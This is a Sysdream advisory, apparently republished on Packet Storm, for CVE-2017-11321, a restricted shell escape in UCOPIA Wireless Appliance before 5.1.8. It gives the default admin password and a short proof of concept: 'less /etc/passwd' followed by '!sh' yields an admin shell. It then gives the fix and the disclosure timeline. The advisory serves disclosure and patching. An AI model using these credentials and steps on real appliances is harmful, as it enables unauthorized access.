exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

UCOPIA Wireless Appliance Restricted Shell Escape

UCOPIA Wireless Appliance Restricted Shell Escape
Posted Sep 29, 2017
Authored by Nicolas Chatelain

UCOPIA Wireless Appliance version prior to 5.1.8 suffer from a restricted shell escape vulnerability.

tags | exploit, shell
advisories | CVE-2017-11321
SHA-256 | b89bf2b19931af9f45509a36fd07550ef582566bfe0c8c59bec4e7227f00f09b

UCOPIA Wireless Appliance Restricted Shell Escape

Change Mirror Download
# [CVE-2017-11321] UCOPIA Wireless Appliance < 5.1.8 Restricted Shell Escape

## Asset Description

UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers.

More than 12,000 UCOPIA solutions are deployed and maintained by UCOPIA expert partners all over the world.

The affected asset in this report is a WiFi management appliance.


## Vulnerability

Shell Escape via `less` command.

**Threat**

Improper sanitization of system commands in the restricted shell interface in UCOPIA Wireless Appliance, prior to 5.1.8, allows remote attackers to gain access to a system shell as the "admin" user.

**CVE ID**: CVE-2017-11321

**Access Vector**: network

**Security Risk**: critical

**Vulnerability**: CWE-78

**CVSS Base Score**: 9.1 (Critical)

**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

### Proof of Concept: Restricted Shell Escape

By default, the UCOPIA wireless appliances exposes two shell access on port 22 (SSH) and 222 (ShellInTheBox).

A documented **admin** user exists on the system with the password **bhu85tgb**.

Quoted from the documentation :

> You can also retrieve the IP address of the outgoing interface. For this, you need to log in to the terminal of the virtual machine with
the following username and password: admin/bhu85tgb, and then execute the interface command.

By logging in within these interfaces, we can access to a restricted shell (*clish*) that allows only a few commands.

However, the `less` command is allowed, and because `less` allows to execute shell commands when viewing a file, we can use it to escape the restricted shell.

Steps :

**1/** Login to the appliance using SSH or ShellInTheBox.

**2/** Run the `less /etc/passwd` command.

**3/** When viewing the file, type `!sh`

**4/** You now have unrestricted `admin` user access to the appliance.

```
> less /etc/passwd
!sh
$ ls /
bin dev etc home lib proc tmp user
$ whoami
admin
```

## Solution

Update to UCOPIA 5.1.8

## Timeline (dd/mm/yyyy)

* 08/03/2017 : Vulnerability discovery.
* 03/05/2017 : Initial contact.
* 10/05/2017 : GPG Key exchange.
* 10/05/2017 : Advisory sent to vendor.
* 17/05/2017 : Request for feedback.
* 22/05/2017 : Vendor acknowledge the vulnerabilities.
* 21/06/2017 : Sysdream Labs request for an ETA, warning for public disclosure.
* 21/06/2017 : Vendor say that the UCOPIA 5.1.8 fixes the issue.
* 29/09/2017 : Public disclosure.

## Credits

* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)

--
SYSDREAM Labs <labs@sysdream.com>

GPG :
47D1 E124 C43E F992 2A2E
1551 8EB4 8CD9 D5B2 59A1

* Website: https://sysdream.com/
* Twitter: @sysdream

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close